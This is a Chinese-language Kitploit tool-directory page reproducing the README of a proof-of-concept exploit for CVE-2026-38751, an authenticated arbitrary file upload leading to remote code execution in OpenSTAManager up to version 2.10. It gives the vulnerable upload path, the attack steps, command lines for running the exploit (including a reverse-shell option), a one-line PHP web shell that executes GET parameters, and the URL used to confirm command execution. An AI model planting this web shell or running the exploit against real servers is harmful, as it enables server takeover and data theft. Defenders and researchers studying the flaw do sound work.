Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC — 该仓库包含针对 CVE-2026-38751 的概念验证(PoC)漏洞利用代码,影响 OpenSTAManager ≤ 2.10。该漏洞允许已认证的攻击者通过模块更新功能上传恶意模块,导致任意文件上传和远程代码执行(RCE)。 | Kitploit
工具/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

该仓库包含针对 CVE-2026-38751 的概念验证(PoC)漏洞利用代码,影响 OpenSTAManager ≤ 2.10。该漏洞允许已认证的攻击者通过模块更新功能上传恶意模块,导致任意文件上传和远程代码执行(RCE)。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
12个月前尚未审核
分享

CVE-2026-38751 – OpenSTAManager 任意文件上传(PoC)

此仓库包含针对 CVE-2026-38751 的概念验证(PoC)漏洞利用代码,影响 OpenSTAManager ≤ 2.10。 该漏洞允许已认证的攻击者通过模块更新功能上传恶意模块,从而导致任意文件上传和远程代码执行(RCE)。

CVE 参考

  • MITRE CVE 条目(首次披露记录): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD(NIST)漏洞数据库: https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • GitHub 安全公告数据库 https://github.com/advisories/GHSA-rm34-fg4m-39mw

受影响软件

  • OpenSTAManager ≤ 2.10
  • 模块更新系统(modules/aggiornamenti/upload_modules.php)

漏洞描述

模块更新功能允许已认证用户上传基于 ZIP 的模块,但未对文件内容或执行边界进行适当验证。 攻击者可以构造包含 PHP 载荷(payload)的恶意模块,这些模块随后会被部署到 Web 根目录,并通过应用程序上下文执行。 这会导致:

  • 任意文件上传(CWE-434)
  • 通过上传的 PHP 文件实现远程代码执行
  • 应用程序上下文被完全攻陷

攻击流程(概要)

  1. 认证到 OpenSTAManager
  2. 上传特制的模块 ZIP 压缩包
  3. 触发模块安装/更新流程
  4. 通过 Web 根目录访问上传的 PHP 载荷
  5. 在服务器上执行任意命令

##Impact 成功利用可实现:

  • 远程命令执行
  • Web 服务器沦陷
  • 数据外泄
  • 根据权限的不同,完全接管应用程序

要求

  • 有效的已认证用户账户
  • 已启用对模块更新功能的访问权限

使用方法(PoC)

  1. 生成恶意模块
root@kitploit:~
python exploit.py --build

生成内容:

root@kitploit:~
update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. 运行漏洞利用程序
root@kitploit:~
python exploit.py <username> <password> <target_url>

可选的反向 Shell 模式:

root@kitploit:~
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

示例载荷(Payload)

root@kitploit:~
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

验证

如果成功,以下端点可执行系统命令: /modules/run/evil.php?cmd=id

MITRE / NVD 参考

  • MITRE CVE 记录: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD 条目: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

免责声明

本项目仅供:

  • 教育目的
  • 授权的安全测试
  • 研究环境

请勿在未经明确许可的情况下对系统使用。

备注

检测结果可能因服务器配置而异。 某些部署可能会禁用模块目录中的直接 PHP 执行。 模块激活的时机可能需要重试。

致谢

  • MITRE CVE 计划
  • NIST 国家漏洞数据库(NVD)
  • OpenSTAManager 项目维护者
  • https://github.com/fuutianyii/poc (首个 PoC)
下载工具